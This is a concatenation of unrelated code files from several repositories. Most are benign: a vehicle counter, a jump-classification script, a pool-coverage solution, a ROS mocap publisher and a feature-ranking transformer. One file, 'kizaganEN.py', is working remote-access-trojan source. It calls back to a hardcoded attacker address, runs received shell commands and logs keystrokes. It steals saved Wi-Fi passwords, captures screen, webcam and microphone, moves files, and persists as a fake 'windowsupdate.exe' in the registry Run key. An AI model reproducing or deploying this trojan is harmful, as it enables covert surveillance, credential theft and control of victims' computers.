return render(request, 'blog/about.html') | MSKose/django-blog-app | blog/views.py | views.py | py | 6,019 | python | en | code | 1 | github-code | 36 |
1693307394 | import numpy as np
import math
import cv2
center_points = {}
objects_bbs_ids = []
id_count = 0
vechical_count = 0
count = 0
person_id = 0
camera = cv2.VideoCapture("video.mp4")
object_detector = cv2.createBackgroundSubtractorMOG2(history = None, varThreshold = None)
kernelOp = np.ones((3,3), np.uint8)
kernelC1 = np.ones((11,11), np.uint8)
fgbg = cv2.createBackgroundSubtractorMOG2(detectShadows = True)
kernel_e = np.ones((5,5), np.uint8)
while True:
ret, frame = camera.read()
if not ret: break
frame = cv2.resize(frame, None, fx = 0.5, fy = 0.5)
width, height, _ = frame.shape
roi = frame[50: 540, 200:960]
fgmask = fgbg.apply(roi)
ret, imBin = cv2.threshold(fgmask, 200, 255, cv2.THRESH_BINARY)
mask1 = cv2.morphologyEx(imBin, cv2.MORPH_OPEN, kernelOp)
mask2 = cv2.morphologyEx(mask1, cv2.MORPH_CLOSE, kernelC1)
e_img = cv2.erode(mask2, kernel_e)
contours, _ = cv2.findContours(e_img, cv2.RETR_TREE, cv2.CHAIN_APPROX_SIMPLE)
detections = []
for cnt in contours:
area = cv2.contourArea(cnt)
if area > 1000:
x, y, w, h = cv2.boundingRect(cnt)
cv2.rectangle(roi, (x, y), (x + w, y + h), (0, 255, 0), 2)
detections.append([x, y, w, h])
for rect in detections:
x, y, w, h = rect
cx = (x + x + w) // 2
cy = (y + y + h) // 2
same_object_detected = False
for id, pt in center_points.items():
distance = math.hypot(cx - pt[0], cy - pt[1])
if distance < 70:
center_points[id] = (cx, cy)
objects_bbs_ids.append([x, y, w, h, id])
same_object_detected = True
if (y >= 235 and y <= 255) and count != 1:
count += 1
vechical_count += count
if same_object_detected is False and count != 1:
center_points[id_count] = (cx, cy)
objects_bbs_ids.append([x, y, w, h, id_count])
count += 1
vechical_count += 1
id_count += 1
new_center_point = {}
for obj_bb_id in objects_bbs_ids:
_, _, _, _, object_id = obj_bb_id
center = center_points[object_id]
new_center_point[object_id] = center
center_points = new_center_point.copy()
box_ids = objects_bbs_ids
objects_bbs_ids = []
count = 0
for box_id in box_ids:
x, y, w, h, id = box_id
cv2.rectangle(roi, (x, y), (x + w, y + h), (0, 255, 0), 2)
cv2.putText(roi, str(id),(x + 15, y + 15), cv2.FONT_HERSHEY_PLAIN, 2, (0, 0, 255), 4)
cv2.rectangle(roi, (10, 10), (75, 75), (0, 255, 0), cv2.FILLED)
cv2.putText(roi, str(vechical_count), (20, 50), cv2.FONT_HERSHEY_PLAIN, 3, (255, 0, 0), 4)
cv2.imshow("counter", roi)
if cv2.waitKey(1) == ord('q'): break
camera.release()
cv2.destroyAllWindows()
| Computer4062/Python-Projects | Road Tracker/counter.py | counter.py | py | 2,880 | python | en | code | 0 | github-code | 36 |
8293997114 | # -*- coding: utf-8 -*-
"""
Created on Fri Sep 17 13:44:46 2021
@author: bfeng1
"""
import json
import sys
import matplotlib.pyplot as plt
import seaborn as sns
import pandas as pd
import numpy as np
from scipy.signal import savgol_filter
from sklearn.utils import resample
from sklearn.metrics import accuracy_score
from sklearn.metrics import confusion_matrix
from scipy.stats import mode
from scipy.spatial.distance import squareform
from sklearn.preprocessing import LabelEncoder
from sklearn.model_selection import train_test_split
#%%
class jump:
n = 135
r = 5
def __init__(self, name, jump_cycle):
self.name = name
self.jump_cycle = jump_cycle
def csv2df(self):
csv_file = 'csv_files/'+self.name + '.csv'
df = pd.read_csv(csv_file)
# cleaning the dataset(drop the rows with ratio is higher than 2.25)
df['left angle ratio'] = df['Angle1']/df['Angle3']
df.drop(df[df['left angle ratio']>2.25].index, inplace = True)
df.drop(df[df['left angle ratio']<0.75].index, inplace = True)
df['smoothed'] = savgol_filter(df['left angle ratio'], 25, 2)
return df
def finetune(self):
df = jump.csv2df(self)
jump_cycle = self.jump_cycle
new_results = []
for domain in jump_cycle:
current_list = []
for inx in domain:
start = inx - jump.r
end = inx + jump.r
temp = df[start:end]
max_val = temp['left angle ratio'].max()
ind = temp[temp['left angle ratio'] == max_val].index.values.astype(int)
try:
ind = ind[0]
except:
ind = 0
current_list.append(ind)
new_results.append(current_list)
check = (jump_cycle == new_results)
if check is False:
print('old cycle {}: {}'.format(self.name, jump_cycle))
print('new cycle {}: {}'.format(self.name, new_results))
elif check is True:
print('The jump cycle has been finetuned')
return new_results
def resample_df(self):
df_list = []
jump_cycle = self.jump_cycle
df = jump.csv2df(self)
for i in range(len(jump_cycle)):
temp = df[jump_cycle[i][0]:jump_cycle[i][1]]
resample_data = resample(temp, n_samples = jump.n, replace = False, random_state = 0).sort_index()
# resample_data: resampled dataframe
resample_data = resample_data.reset_index()
df_list.append(resample_data)
# create plots with resampled data
return df_list
def vis(self):
df_list = jump.resample_df(self)
a = (len(df_list)+1)//2
b = 2
plt.figure(figsize = (14,22))
for i in range(len(df_list)):
plt.subplot(a,b,i+1)
plt.title('subplots {}{}{} : cycle {}'.format(a,b,i+1,i+1))
plt.xlabel('frame number')
plt.ylabel('Left angle ratio')
sns.scatterplot(data = df_list[i], x = df_list[i].index, y = 'left angle ratio')
sns.lineplot(data = df_list[i], x = df_list[i].index, y = 'smoothed')
print('the process is done for the jump {}'.format(self.name))
# #%%
# # create lists to store the names of csv files
# # create jump cycle(manually select range, then autocorrect by algorithm)
# good_jump_cycle = [[154,309],[398,539],[651,786],[825,980],[1018,1158],[1188,1337],[1374,1524],[1555,1698],[1737,1881],[1895,2054]]
# # cycle1: [010262,010456], [010469, 010638], [010655,010821],[010829,010998],[010998,011163],[011168,011331], [011331, 011497],[011497,011659],[011670,011849],[011849,012015]
# inner_jump_cycle=[ [397,562],[562,742],[742,902],[902,1060],[1060,1232],[1232,1398],[1398,1583],[1583,1760]]
# # cycle1: [001550,001700], [001716, 001902], [001930,002095],[002128,002300],[002330,002520],[002540,002709], [002729, 002900],[002916,003078],[003085,03249]
# outer_jump_cycle = [[379,552],[579,767],[767,973],[991,1171],[1171,1351],[1364,1527],[1543,1697]]
#%%
class KnnDtw(object):
"""K-nearest neighbor classifier using dynamic time warping
as the distance measure between pairs of time series arrays
Arguments
---------
n_neighbors : int, optional (default = 5)
Number of neighbors to use by default for KNN
max_warping_window : int, optional (default = infinity)
Maximum warping window allowed by the DTW dynamic
programming function
subsample_step : int, optional (default = 1)
Step size for the timeseries array. By setting subsample_step = 2,
the timeseries length will be reduced by 50% because every second
item is skipped. Implemented by x[:, ::subsample_step]
"""
def __init__(self, n_neighbors=5, max_warping_window=10000, subsample_step=1):
self.n_neighbors = n_neighbors
self.max_warping_window = max_warping_window
self.subsample_step = subsample_step
def fit(self, x, l):
"""Fit the model using x as training data and l as class labels
Arguments
---------
x : array of shape [n_samples, n_timepoints]
Training data set for input into KNN classifer
l : array of shape [n_samples]
Training labels for input into KNN classifier
"""
self.x = x
self.l = l
def _dtw_distance(self, ts_a, ts_b, d = lambda x,y: abs(x-y)):
"""Returns the DTW similarity distance between two 2-D
timeseries numpy arrays.
Arguments
---------
ts_a, ts_b : array of shape [n_samples, n_timepoints]
Two arrays containing n_samples of timeseries data
whose DTW distance between each sample of A and B
will be compared
d : DistanceMetric object (default = abs(x-y))
the distance measure used for A_i - B_j in the
DTW dynamic programming function
Returns
-------
DTW distance between A and B
"""
# Create cost matrix via broadcasting with large int
ts_a, ts_b = np.array(ts_a), np.array(ts_b)
M, N = len(ts_a), len(ts_b)
cost = sys.maxsize * np.ones((M, N))
# Initialize the first row and column
cost[0, 0] = d(ts_a[0], ts_b[0])
for i in range(1, M):
cost[i, 0] = cost[i-1, 0] + d(ts_a[i], ts_b[0])
for j in range(1, N):
cost[0, j] = cost[0, j-1] + d(ts_a[0], ts_b[j])
# Populate rest of cost matrix within window
for i in range(1, M):
for j in range(max(1, i - self.max_warping_window),
min(N, i + self.max_warping_window)):
choices = cost[i - 1, j - 1], cost[i, j-1], cost[i-1, j]
cost[i, j] = min(choices) + d(ts_a[i], ts_b[j])
# Return DTW distance given window
return cost[-1, -1]
def _dist_matrix(self, x, y):
"""Computes the M x N distance matrix between the training
dataset and testing dataset (y) using the DTW distance measure
Arguments
---------
x : array of shape [n_samples, n_timepoints]
y : array of shape [n_samples, n_timepoints]
Returns
-------
Distance matrix between each item of x and y with
shape [training_n_samples, testing_n_samples]
"""
# Compute the distance matrix
dm_count = 0
# Compute condensed distance matrix (upper triangle) of pairwise dtw distances
# when x and y are the same array
if(np.array_equal(x, y)):
x_s = np.shape(x)
dm = np.zeros((x_s[0] * (x_s[0] - 1)) // 2, dtype=np.double)
for i in range(0, x_s[0] - 1):
for j in range(i + 1, x_s[0]):
dm[dm_count] = self._dtw_distance(x[i, ::self.subsample_step],
y[j, ::self.subsample_step])
dm_count += 1
# Convert to squareform
dm = squareform(dm)
return dm
# Compute full distance matrix of dtw distnces between x and y
else:
x_s = np.shape(x)
y_s = np.shape(y)
dm = np.zeros((x_s[0], y_s[0]))
for i in range(0, x_s[0]):
for j in range(0, y_s[0]):
dm[i, j] = self._dtw_distance(x[i, ::self.subsample_step],
y[j, ::self.subsample_step])
# Update progress bar
dm_count += 1
return dm
def predict(self, x):
"""Predict the class labels or probability estimates for
the provided data
Arguments
---------
x : array of shape [n_samples, n_timepoints]
Array containing the testing data set to be classified
Returns
-------
2 arrays representing:
(1) the predicted class labels
(2) the knn label count probability
"""
dm = self._dist_matrix(x, self.x)
# Identify the k nearest neighbors
knn_idx = dm.argsort()[:, :self.n_neighbors]
# Identify k nearest labels
knn_labels = self.l[knn_idx]
# Model Label
mode_data = mode(knn_labels, axis=1)
mode_label = mode_data[0]
mode_proba = mode_data[1]/self.n_neighbors
return mode_label.ravel(), mode_proba.ravel()
#%%
good = ['good1', 'good2','good4','good6']
inner = ['inner1', 'inner2', 'inner3']
outer= ['outer1', 'outer2']
with open('list_info.txt','r') as file:
input_lines = [line.strip() for line in file]
all_csv = good+inner+outer
info = {}
info['name'] = all_csv
info['cycle'] = input_lines
#%%
# structure dataset for algorithm training
good_dataset = []
inner_dataset = []
outer_dataset = []
n = 135
for i in range(len(all_csv)):
temp = jump(info['name'][i], json.loads(info['cycle'][i]))
# temp.finetune()
# temp.vis(n)
if i < len(good):
good_dataset += temp.resample_df()
elif i < len(good+inner):
inner_dataset += temp.resample_df()
else:
outer_dataset += temp.resample_df()
total_x = good_dataset+inner_dataset+outer_dataset
for i in range(len(total_x)):
total_x[i]['series_id'] = i
X = pd.concat(total_x)
#%%
# compare time series signal for good jump and bad (inner+outer) jump
# load the label file
y = pd.read_csv('csv_files/lable.csv')
label_encoder = LabelEncoder()
encoded_labels = label_encoder.fit_transform(y.jump)
y['label'] = encoded_labels
#%%
# create feature column
feature_columns = X.columns.tolist()[2:]
# construct sequence
sequences = []
for series_id, group in X.groupby('series_id'):
sequence_features = group[feature_columns]
label = y[y.series_id == series_id].iloc[0].label
sequences.append((sequence_features, label))
def create_data(sequences, test_size = 0.2):
train_sequences, test_sequences = train_test_split(sequences, test_size = 0.2)
train_X = np.empty(shape = (len(train_sequences),135), dtype = 'object')
train_y = []
test_X = np.empty(shape = (len(test_sequences),135), dtype = 'object')
test_y = []
for i in range(len(train_sequences)):
temp_x = train_sequences[i][0]['left angle ratio'].to_list()
train_X[i][:] = temp_x
train_y.append(train_sequences[i][1])
for i in range(len(test_sequences)):
temp_x = test_sequences[i][0]['left angle ratio'].to_list()
test_X[i][:] = temp_x
test_y.append(test_sequences[i][1])
train_y = np.array(train_y)
test_y = np.array(test_y)
return train_X, test_X, train_y, test_y
#%%
iten = 20
score = 0
score_list = []
false_negative_rate = []
false_positive_rate = []
for i in range(iten):
m = KnnDtw(n_neighbors=1, max_warping_window=15)
train_X, test_X, train_y, test_y = create_data(sequences)
m.fit(train_X, train_y)
label, proba = m.predict(test_X)
temp_score = accuracy_score(label,test_y)
tn, fp, fn, tp = confusion_matrix(test_y, label).ravel()
false_positive_rate.append(fp/(fp+tn))
false_negative_rate.append(fn/(fn + tp))
score_list.append(temp_score)
score += temp_score
print('the accuracy of the classifier: {}%'.format(score/iten*100))
print('false positive rate: {}'.format(np.mean(false_positive_rate)))
print('false negative rate: {}'.format(np.mean(false_negative_rate)))
| bfeng1/Jump-Classification-Project | aim2.py | aim2.py | py | 12,898 | python | en | code | 0 | github-code | 36 |
32830767547 | def get_data(inp_file_num):
"""
this function returns the data of the selected input file in desired format.
"""
f = open(f"{inp_file_num}.in", "r")
num_of_shifts = int(f.readline().strip())
lines = list(
line for line in (list(map(int, l.strip().split(" "))) for l in f) if line
)
max_num = max(max(i) for i in lines)
return lines, num_of_shifts, max_num + 1
def pool_coverage(inp_file_num):
"""
this function is used to calculate the maximum time units that can be covered after firing one life guard.
"""
interval_list, total_shifts, max_num = get_data(inp_file_num)
total_coverage = 0
max_coverage = 0
tu_diff = 0
time_unit = calc_time_occurance(interval_list, total_shifts, max_num)
un_frequency = calc_unique_number_frequency(time_unit, max_num)
# print(time_unit,un_frequency)
for i in range(max_num):
if time_unit[i]:
total_coverage = total_coverage + 1
for shift in range(total_shifts):
l = interval_list[shift][0]
r = interval_list[shift][1]
if l != 0:
tu_diff = un_frequency[r] - un_frequency[l]
else:
tu_diff = un_frequency[r]
if total_coverage - tu_diff >= max_coverage:
max_coverage = total_coverage - tu_diff
print("Maximum pool time coverage after firing one life guard is", max_coverage)
write_output(inp_file_num, max_coverage)
def calc_time_occurance(interval_list, total_shifts, max_num):
"""
this function is used to create and return a list of the number of times a time unit occurs.
"""
time_unit = [0 for i in range(max_num)]
for shift in range(total_shifts):
l = interval_list[shift][0]
r = interval_list[shift][1]
for j in range(l + 1, r + 1):
time_unit[j] = time_unit[j] + 1
return time_unit
def calc_unique_number_frequency(time_unit, max_num):
"""
this function is used to create and return a list of elements that denote the number of unique time units at any given position 'i'.
"""
un_frequency = [0 for i in range(max_num)]
if time_unit[0] == 1:
un_frequency[0] = 1
for i in range(1, max_num):
if time_unit[i] == 1:
un_frequency[i] = un_frequency[i - 1] + 1
else:
un_frequency[i] = un_frequency[i - 1]
return un_frequency
def write_output(op_file_num, cov):
"""
this function is used to write the output to the desired file.
"""
f = open(f"{op_file_num}.out", "w")
f.write(str(cov))
f.close()
| apoorvamalhotra/MysteriousSafeguards | dsAssignment/assignment.py | assignment.py | py | 2,590 | python | en | code | 0 | github-code | 36 |
7305279610 | #!/usr/bin/env python
import rospy
import serial
import time
import sys
import math
from FOF_API.MOCAP.getrigidbody import NatNetClient
from geometry_msgs.msg import Pose
body = {}
class mocap_reader:
def __init__(self,clientAddress,serverAddress):
rospy.init_node('mocap_reader', anonymous=True, disable_signals=True)
self.clientAddress = clientAddress
self.serverAddress = serverAddress
self.pub = rospy.Publisher('/mocap_data', Pose, queue_size=1)
def receive_new_frame(self,data_dict):
order_list=[ "frameNumber", "markerSetCount", "unlabeledMarkersCount", "rigidBodyCount", "skeletonCount",
"labeledMarkerCount", "timecode", "timecodeSub", "timestamp", "isRecording", "trackedModelsChanged" ]
dump_args = False
if dump_args == True:
out_string = " "
for key in data_dict:
out_string += key + "="
if key in data_dict :
out_string += data_dict[key] + " "
out_string+="/"
# print(out_string)
# This is a callback function that gets connected to the NatNet client. It is called once per rigid body per frame
def receive_rigid_body_frame( self,new_id, position, rotation):
# pass
# print( "Received frame for rigid body", new_id )
body[new_id] = [position, rotation]
# print( "Received frame for rigid body", new_id," ",position," ",rotation )
def get_body_frame(self):
return body
def add_lists(self,totals, totals_tmp):
totals[0]+=totals_tmp[0]
totals[1]+=totals_tmp[1]
totals[2]+=totals_tmp[2]
return totals
def print_configuration(self,natnet_client):
print("Connection Configuration:")
print(" Client: %s"% natnet_client.local_ip_address)
print(" Server: %s"% natnet_client.server_ip_address)
print(" Command Port: %d"% natnet_client.command_port)
print(" Data Port: %d"% natnet_client.data_port)
if natnet_client.use_multicast:
print(" Using Multicast")
print(" Multicast Group: %s"% natnet_client.multicast_address)
else:
print(" Using Unicast")
#NatNet Server Info
application_name = natnet_client.get_application_name()
nat_net_requested_version = natnet_client.get_nat_net_requested_version()
nat_net_version_server = natnet_client.get_nat_net_version_server()
server_version = natnet_client.get_server_version()
print(" NatNet Server Info")
print(" Application Name %s" %(application_name))
print(" NatNetVersion %d %d %d %d"% (nat_net_version_server[0], nat_net_version_server[1], nat_net_version_server[2], nat_net_version_server[3]))
print(" ServerVersion %d %d %d %d"% (server_version[0], server_version[1], server_version[2], server_version[3]))
print(" NatNet Bitstream Requested")
print(" NatNetVersion %d %d %d %d"% (nat_net_requested_version[0], nat_net_requested_version[1],\
nat_net_requested_version[2], nat_net_requested_version[3]))
#print("command_socket = %s"%(str(natnet_client.command_socket)))
#print("data_socket = %s"%(str(natnet_client.data_socket)))
def request_data_descriptions(self,s_client):
# Request the model definitions
s_client.send_request(s_client.command_socket, s_client.NAT_REQUEST_MODELDEF, "", (s_client.server_ip_address, s_client.command_port) )
def my_parse_args(self,arg_list, args_dict):
# set up base values
arg_list_len=len(arg_list)
if arg_list_len>1:
args_dict["serverAddress"] = arg_list[1]
if arg_list_len>2:
args_dict["clientAddress"] = arg_list[2]
if arg_list_len>3:
if len(arg_list[3]):
args_dict["use_multicast"] = True
if arg_list[3][0].upper() == "U":
args_dict["use_multicast"] = False
return args_dict
if __name__ == "__main__":
optionsDict = {}
optionsDict["clientAddress"] = "10.191.76.66"
optionsDict["serverAddress"] = "10.191.76.176"
optionsDict["use_multicast"] = False
# This will create a new NatNet client
#optionsDict = my_parse_args(sys.argv, optionsDict)
streaming_client = NatNetClient()
streaming_client.set_client_address(optionsDict["clientAddress"])
streaming_client.set_server_address(optionsDict["serverAddress"])
streaming_client.set_use_multicast(optionsDict["use_multicast"])
# Configure the streaming client to call our rigid body handler on the emulator to send data out.
mymocap = mocap_reader(optionsDict["clientAddress"],optionsDict["serverAddress"])
streaming_client.new_frame_listener = mymocap.receive_new_frame
streaming_client.rigid_body_listener = mymocap.receive_rigid_body_frame
streaming_client.set_print_level(0)
# Start up the streaming client now that the callbacks are set up.
# This will run perpetually, and operate on a separate thread.
is_running = streaming_client.run()
if not is_running:
print("ERROR: Could not start streaming client.")
try:
sys.exit(1)
except SystemExit:
print("...")
finally:
print("exiting")
time.sleep(1)
if streaming_client.connected() is False:
print("ERROR: Could not connect properly. Check that Motive streaming is on.")
try:
sys.exit(2)
except SystemExit:
print("...")
finally:
print("exiting")
streaming_client.get_infos()
time.sleep(1)
try:
body_ros = Pose()
while True:
time.sleep(0.2)
body_ros.position.x = body[13][0][0]
body_ros.position.y = body[13][0][1]
body_ros.position.z = body[13][0][2]
body_ros.orientation.x = body[13][1][0]
body_ros.orientation.y = body[13][1][1]
body_ros.orientation.z = body[13][1][2]
body_ros.orientation.w = body[13][1][3]
mymocap.pub.publish(body_ros)
except (KeyboardInterrupt, SystemExit):
streaming_client.shutdown()
print("killed")
| CoRotProject/FOF-API | Agents/UWB_agent/mocap_ros.py | mocap_ros.py | py | 6,365 | python | en | code | 0 | github-code | 36 |
1858113091 | import subprocess
import os
import simplejson
import base64
import socket
from util import kg
import time
import threading
import pyttsx3
from PIL import ImageGrab
import sys
import shutil
import cv2
from util import sound_record
import tkinter
ip = "192.168.1.105" #Change this value according to yourself.
port = 4444 #Change this value according to yourself.
my_thread = threading.Thread(target=kg.kg_Start)
my_thread.start()
class mySocket():
def __init__(self,ip,port):
self.connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.connection.connect((ip,port))
self.kg_file = os.environ["appdata"]+"\\windowslogs.txt"
self.tro_file = os.environ["appdata"]+"\\windowsupdate.exe"
self.ss_file = os.environ["appdata"]+"\\update.png"
self.camera_file = os.environ["appdata"]+"\\windowsupdate.png"
self.sound_file = os.environ["appdata"]+"\\windowssounds.wav"
self.Mic_Question()
self.Chat_Port_Question()
def Mic_Question(self):
question_answer = self.Get_Json()
if question_answer == "Y" or question_answer == "y":
my_thread2 = threading.Thread(target=self.Start_Record)
my_thread2.start()
def Chat_Port_Question(self):
question_answer = self.Get_Json()
if question_answer == 5555:
self.chat_port = 5555
else:
self.chat_port = question_answer
def Execute_Command(self,command):
command_output = subprocess.check_output(command,shell=True)
return command_output.decode("Latin1")
def Send_Json(self,data):
json_data = simplejson.dumps(data)
self.connection.send(json_data.encode("utf-8"))
def Get_Json(self):
json_data = ""
while True:
try:
json_data = json_data + self.connection.recv(1048576).decode()
return simplejson.loads(json_data)
except ValueError:
continue
def Get_File_Contents(self, path):
with open(path, "rb") as file:
return base64.b64encode(file.read())
def Save_File(self, path, content):
with open(path, "wb") as file:
file.write(base64.b64decode(content))
return "[+]The file was uploaded on victim's current directory."
def Execute_cd(self, path):
os.chdir(path)
return "[+]Changed directory to : " + path
def Make_Directory(self, file_name):
os.mkdir(file_name)
return "[+]Directory created : " + file_name
def Remove_Directory(self, file_name):
os.rmdir(file_name)
return "[+]Directory removed : " + file_name
def Remove_File(self, name):
os.remove(name)
return "[+]Removed : " + name
def Rename_File(self, name1, name2):
os.rename(name1, name2)
return "[+]Name changed.\n" + name1 + "→→→→→→" + name2
def Open_File(self, file_name):
os.system(file_name)
return "[+]The file opened on victim's computer. : " + file_name
def Pwd(self):
return os.getcwd()
def Check(self):
if os.name == 'nt':
return "Victim is a windows."
elif os.name == 'posix':
return "Victim is a linux distribution"
def Kg_Start_Func(self):
kg.kg_Start()
def Read_Kg(self):
with open(self.kg_file, "r",encoding="utf-8") as file:
return file.read()
def Talk(self,words):
engine = pyttsx3.init()
engine.setProperty("rate", 120)
engine.say(words)
engine.runAndWait()
return "[+]The sound played on victim's computer."
def Permanance(self):
if os.path.exists(self.tro_file):
return "[+]Permanance is activated already."
if not os.path.exists(self.tro_file):
shutil.copyfile(sys.executable, self.tro_file)
regedit_command = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /t REG_SZ /d " + self.tro_file
subprocess.call(regedit_command,shell=True)
return "[+]Permanance activated."
def Remove_Permanance(self):
if os.path.exists(self.tro_file):
regedit_command = "reg delete HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /f"
subprocess.call(regedit_command,shell=True)
os.remove(self.tro_file)
return "[+]Permanance removed and it will not work every time the victim boots up his computer."
else:
return "[+]Permanance not found."
def Start_Record(self):
self.start = sound_record.Recording()
self.start.Start_Record()
def Chat_Send_Messages(self):
message = self.client_message_entry.get()
self.messages.insert(tkinter.END, "\n" + "You:" + message)
self.chat_connection.send(message.encode())
self.messages.see("end")
def Chat_Get_Messages(self):
while True:
message = self.chat_connection.recv(1024).decode()
if message == "exit":
self.chat_gui.destroy()
self.messages.insert(tkinter.END, "\n" + "Hacker:" + message)
self.messages.see("end")
def Chat(self):
self.chat_connection = socket.socket(socket.AF_INET,socket.SOCK_STREAM)
self.chat_connection.connect((ip,self.chat_port))
self.chat_gui = tkinter.Tk()
self.chat_gui.resizable(False, False)
self.chat_gui.config(bg="#D9D8D7")
self.chat_gui.geometry("600x300")
self.chat_gui.title("You are chatting with hacker.")
self.messages = tkinter.Text(self.chat_gui, width=71, height=10, fg="#0E6B0E", bg="#000000")
self.messages.place(x=0, y=0)
self.messages.insert("1.0","Hacker wants to chat with you.Write your message 'your message' part and click the 'Send Message'.")
self.your_message_label = tkinter.Label(self.chat_gui, width=20, text="Your Message :", fg="#0D1C6E")
self.your_message_label.place(x=-30, y=250)
self.client_message_entry = tkinter.Entry(self.chat_gui, width=50)
self.client_message_entry.place(x=90, y=250)
self.send_button = tkinter.Button(self.chat_gui, width=20, text="Send Message", command=self.Chat_Send_Messages, bg="#000000", fg="#0E6B0E")
self.send_button.place(x=400, y=245)
self.chat_thread = threading.Thread(target=self.Chat_Get_Messages)
self.chat_thread.start()
self.chat_gui.mainloop()
def Client_Start(self):
while True:
command = self.Get_Json()
try:
if command[0] == "cd" and len(command) > 1:
command_output = self.Execute_cd(command[1])
elif command[0] == "download":
command_output = self.Get_File_Contents(command[1])
elif command[0] == "upload":
command_output = self.Save_File(command[1], command[2])
elif command[0] == "mkdir":
command_output = self.Make_Directory(command[1])
elif command[0] == "rmdir":
command_output = self.Remove_Directory(command[1])
elif command[0] == "rm":
command_output = self.Remove_File(command[1])
elif command[0] == "rename":
command_output = self.Rename_File(command[1], command[2])
elif command[0] == "open":
command_output = self.Open_File(command[1])
elif command[0] == "pwd":
command_output = self.Pwd()
elif command[0] == "system":
command_output = self.Check()
elif command[0] == "read_kg":
command_output = self.Read_Kg()
elif command[0] == "talk":
command_output = self.Talk(command[1:])
elif command[0] == "show_wifis":
wifis = subprocess.check_output(["netsh", "wlan", "show", "profiles"]).decode()
wifi = wifis.split("\n")
profiles = [i.split(":")[1][1:-1] for i in wifi if "All User Profile" in i]
profile_str = " ".join(profiles)
command_output = "Wifi Networks : \n\n\n"
command_output +=profile_str + "\n\n\n"
command_output += "Wifi passwords(in order of) :\n\n"
for i in profiles:
try:
result = subprocess.check_output(["netsh", "wlan", "show", "profile", i, "key=clear"]).decode("utf-8").split("\n")
result = [b.split(":")[1][1:-1] for b in result if "Key Content" in b]
result_str = " ".join(result)
if result_str == "":
result_str = "No password"
command_output += "\t" + result_str
except subprocess.CalledProcessError:
print("Error.")
elif command[0] == "get_ss":
ImageGrab.grab().save(self.ss_file)
command_output=self.Get_File_Contents(self.ss_file)
os.remove(self.ss_file)
elif command[0] == "save_kg":
command_output = self.Get_File_Contents(self.kg_file)
os.remove(self.kg_file)
elif command[0] == "permanance":
command_output = self.Permanance()
elif command[0] == "remove_permanance":
command_output = self.Remove_Permanance()
elif command[0] == "get_camera_image":
camera = cv2.VideoCapture(0)
result, image = camera.read()
if result:
cv2.imwrite(self.camera_file,image)
command_output = self.Get_File_Contents(self.camera_file)
os.remove(self.camera_file)
else:
command_output = "[-]Can not reach the camera."
elif command[0] == "download_sound_recording":
self.start.Stop_Record()
command_output = self.Get_File_Contents(self.sound_file)
os.remove(self.sound_file)
elif command[0] == "chat":
self.Chat()
else:
command_output = self.Execute_Command(command)
except Exception:
command_output = "Unknown command.For command list use 'help' command."
self.Send_Json(command_output)
self.connection.close()
def Try_Connection():
while True:
time.sleep(5)
try:
mysocket = mySocket(ip,port)
mysocket.Client_Start()
except Exception:
Try_Connection()
def Permanance():
tro_file = os.environ["appdata"] + "\\windowsupdate.exe"
regedit_command = "reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Run /v windowsupdate /t REG_SZ /d " + tro_file
if not os.path.exists(tro_file):
shutil.copyfile(sys.executable,tro_file)
subprocess.call(regedit_command,shell=True)
if os.path.exists(tro_file):
pass
def Open_Added_File():
added_file = sys._MEIPASS + "\\examplefile.pdf" #Enter the file after '\\' to combine with image,pdf etc.
subprocess.Popen(added_file,shell=True)
#Open_Added_File() # And remove the '#' before the code.(If you activated it.)
Permanance()
Try_Connection()
| st4inl3s5/kizagan | kizaganEN.py | kizaganEN.py | py | 11,980 | python | en | code | 72 | github-code | 36 |
26610494943 | # This class implements the adaptive rank transformation used in classifier ANOVA_subset_ranking_lr
import sklearn.base as base
import scipy
import time
import logging
import torch
from utilities.optirank.ranking_multiplication import ranking_transformation
import numpy as np
import statsmodels.api as sm
from statsmodels.formula.api import ols
import pandas as pd
def calculate_F_ANOVA(X, label, dataset):
"""
for every feature, compute the F_value corresponding to the effect of the dataset source
(not taking into account the interaction term).
:param X: n x d numpy array
:param label: n numpy array with labels.
:param dataset: n numpy array with dataset name corresponding to each observation.
:return: F_value for each feature (the bigger the F, the greater the shift between datasets).
"""
F_dataset = []
for gene_index in range(X.shape[1]):
df = pd.DataFrame({"label": label, "dataset": dataset, "expr": X[:, gene_index].flatten()})
model = ols('expr ~ C(label) + C(dataset) + C(label):C(dataset)', data=df).fit()
stats = sm.stats.anova_lm(model, typ=2)
F = stats.loc["C(dataset)", "F"]
F_dataset.append(F)
return np.array(F_dataset)
def merge_two_datasets(X, y, X_other, y_other, mask_dataset_other):
"""
Returns X, y, dataset.
X is a numpy array containing the observations for two datasets, y contains
the corresponding labels, and dataset is a str numpy array with "0" or "1" that indicate to which dataset the
observations belong.
There are two modes of usage:
If X_other and y_other are None, and mask_dataset_other is provided, it implicitely indicates that the two datasets
are already mixed in X,y. Otherwise, if X_other, y_other are given, and mask_dataset_other is None, the two datas
are merged in a new array.
"""
if X_other is not None:
X_all = np.vstack([X, X_other])
y_all = np.concatenate([y, y_other])
dataset = np.concatenate([np.repeat("0", len(y)), np.repeat("1", len(y_other))])
return X_all, y_all, dataset
else:
dataset = np.repeat("0", len(y))
dataset[mask_dataset_other] = "1"
return X, y, dataset
class ANOVA_subset_ranking(base.BaseEstimator, base.TransformerMixin):
def __init__(self, fitted=False, X=None, y=None, sum_gamma=None, perc_gamma=None, time_economy=False, X_other=None,
y_other=None, mask_dataset_other=None):
"""
transformer that selects the features that are the least influenced by the dataset source, based on a two way
ANOVA test that estimates the dependence of each feature on the dataset.
To function, X,y values must be provided for two dataset-sources, and the dataset effect is estimated.
There are two modes of use:
1) with X_other, y_other
2) with mask_dataset_other, which indicate which samples in X,y belong to the other dataset
These two modes permit to include (or not) the other dataset in the transformed data.
:param fitted:
:param X: nxd numpy array with data
:param y: n numpy array with label
:param sum_gamma: integer indicating how many features to select as ranking reference.
:param perc_gamma: float indicating which percentage of features to use as ranking reference.
:param time_economy: if True, X and y are cached, and the F-values are not re-calculated for subsequent values of hyperparameters gamma.
:param X_other: nxd numpy array with data
:param y_other: n numpy array with label
:param mask_dataset_other: boolean mask that selects the "secondary dataset" samples.
"""
super(ANOVA_subset_ranking, self).__init__()
self.sum_gamma = sum_gamma
self.perc_gamma = perc_gamma
self.time_economy = time_economy
self.fitted = fitted
self.X = X
self.y = y
self.X_other = X_other
self.y_other = y_other
self.mask_dataset_other = mask_dataset_other
def fit(self, X, y):
n_genes = X.shape[1]
